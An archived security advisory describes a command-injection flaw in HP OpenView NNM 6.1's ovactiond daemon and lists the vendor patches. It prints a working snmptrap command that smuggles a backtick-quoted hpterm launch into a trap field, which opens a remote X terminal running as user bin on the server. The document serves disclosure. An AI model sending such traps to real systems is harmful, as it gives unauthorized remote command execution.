TUCoPS :: Unix :: General
:: nnm5.htm
OpenView execute any program
Vulnerability
OpenView
Affected
HP Openview NNM6.1
Description
Milo van der Zee found following. HP Openview NNM6.1 and earlier
running on unix have a problem with the suid bin executable
ovactiond. It allows for starting of any program by just sending
a trap or event to the station running the daemon.
Actually the executable is NOT suid bin but it does run as user
bin (probably an internal suid system call or started from the pmd
that runs as bin or ...). So when you do a 'ps -ef | grep
ovactiond' you will see that it is running as bin. Even on
Solaris.
In the trapd.conf the following is defined by default (NNM6.1):
#
EVENT
OV_MgX_NNM_Generic .1.3.6.1.4.1.11.2.17.1.0.6000
0208 "Configuration Alarms" Warning
FORMAT Generic NNM to MgX message. 12ドル
EXEC echo snmpnotify -v 1 -e 1.3.6.1.4.1.11.2.17.1
10ドル 1.3.[snip...]
#
By sending this trap:
snmptrap -v 1 <NNM host> .1.3.6.1.4.1.11.2.17.1 1.2.3.4 6 60000208 0 1 s "" 2 s "" 3 s "\`/usr/bin/X11/hpterm -display <your client display>\`" 4 s "" [snip...] 12 s ""
You get an hpterm on your client display running under user bin on
the NNM server. The reason is that NNM first completes the
command under the EXEC and then starts that in a shell.
Solution
Apply one of these patches:
HP-UX 11.00 HP-UX 10.20 SOLARIS 2.X WinNT4.X/2000
PHSS_23780 PHSS_23779 PSOV_02905 NNM_00698